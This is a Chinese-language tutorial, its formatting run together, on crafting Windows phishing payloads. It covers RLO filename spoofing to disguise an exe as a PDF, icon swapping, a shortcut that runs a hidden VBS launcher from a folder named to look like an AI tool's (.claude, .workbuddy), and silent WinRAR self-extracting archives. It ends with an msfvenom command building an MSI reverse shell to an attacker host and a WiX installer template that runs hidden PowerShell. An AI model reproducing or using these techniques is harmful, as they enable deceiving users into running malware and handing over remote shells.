
預(yù)備一個(gè)彈計(jì)算器的exe來充當(dāng)木馬#includewindows.hintmain(){WinExec(calc.exe,SW_SHOW);return0;}編譯成exegcc test.c -o calc.exeRLO混淆法Right-to-Left Override是反轉(zhuǎn)文件名顯示的方式通過反轉(zhuǎn)把原本exe的文件后綴名反轉(zhuǎn)到前面達(dá)到混淆的方式這里先把名字全清空留下來一個(gè)后綴名選擇RLO輸入dm(因?yàn)檫@里是倒著寫的)再次重命名在前面加上一些英文/中文用于掩蓋我們的exe這樣在名字上就掩蓋好了在實(shí)際的釣魚中你可以改成什么福利啊后綴名改成fdp(寫進(jìn)去就變成pdf了)等等然后就是改ico圖標(biāo)(當(dāng)然了接下來你讓ai做也是可以的)這里需要用到工具-ResourceHacker找到Typora.exe拖到resourcehacker點(diǎn)擊Icon就可以找到他的icon右鍵保存就可以了打開我們的exe然后點(diǎn)擊Actino-Add an Image…然后選中我們的icon點(diǎn)擊保存就可以了成功LNK釣魚快捷方式釣魚法用到了快捷方式可以打開cmd來執(zhí)行命令的特點(diǎn)同時(shí)需要用到壓縮包發(fā)送先創(chuàng)建一個(gè)文件夾這里推薦使用.claude或者.workbuddy這樣的文件夾來假裝是一個(gè)ai的文件夾點(diǎn)擊屬性我們可以選擇隱藏來把這個(gè)文件夾隱藏起來里面放一個(gè)txt文件和我們的釣魚exe還有啟動(dòng)的VBS(這個(gè)是防止出現(xiàn)黑框)VBS內(nèi)容是Set o CreateObject(WScript.Shell) Set fso CreateObject(Scripting.FileSystemObject) path fso.GetParentFolderName(WScript.ScriptFullName) o.Run path \123.txt,0 o.Run path \123.exe,0新建一個(gè)快捷方式點(diǎn)屬性改成wscript.exe .workbuddy\run.vbs拿到notepad的ico更改圖標(biāo)設(shè)置成剛剛保存的ico這樣就可以了然后打包成.zip就可以啦成功自解壓釣魚法這里需要使用到winrar設(shè)置這個(gè)壓縮包為自解壓(Create SFX archive)點(diǎn)擊高級(jí)設(shè)置(Advanced)點(diǎn)SFX options然后Path to extract這里可以選擇你解壓的路徑這里我覺得可以設(shè)置白加黑DLL(在你知道你要把你的黑DLL放在哪里的時(shí)候)或者是把你的目錄給放到特定的位置在Setup這里有一個(gè)在解壓之前運(yùn)行和解壓之后運(yùn)行比如說我解壓到我C盤下解壓后我就運(yùn)行123.exe(壓縮包里自帶)當(dāng)然了這里你還可以去比如說白加黑以后運(yùn)行exe啊或者是搞一個(gè)dll注入器直接注入都是沒問題的,我覺得都是很好的隱藏點(diǎn)這里只做演示Modes選hide all防止彈窗然后我們就獲得了一個(gè)自解壓的exe文件.scr釣魚法直接把exe改成scr就行了因?yàn)閟cr本質(zhì)是exe文件可以直接運(yùn)行msi釣魚法這里用msf生成msimsfvenom -p windows/x64/powershell_reverse_tcp LHOST192.168.47.128 LPORT4444 -f msi -o test1.msipython3 -m http.server 8080訪問下載運(yùn)行安裝成功反彈shell當(dāng)然了這里不用msf也可以用WiX進(jìn)行安裝包的打包?xml version1.0? Wix xmlnshttp://schemas.microsoft.com/wix/2006/wi Product Id* NameFakeInstall Language2052 Version1.0.0 Manufacturertest UpgradeCodePUT-GUID-HERE Package InstallerVersion200 Compressedyes / CustomAction IdEvilCmd DirectoryTARGETDIR ExeCommandpowershell -nop -w hidden -c 你的powershell反彈命令 Returnignore / InstallExecuteSequence Custom ActionEvilCmd AfterInstallInitialize / /InstallExecuteSequence /Product /Wix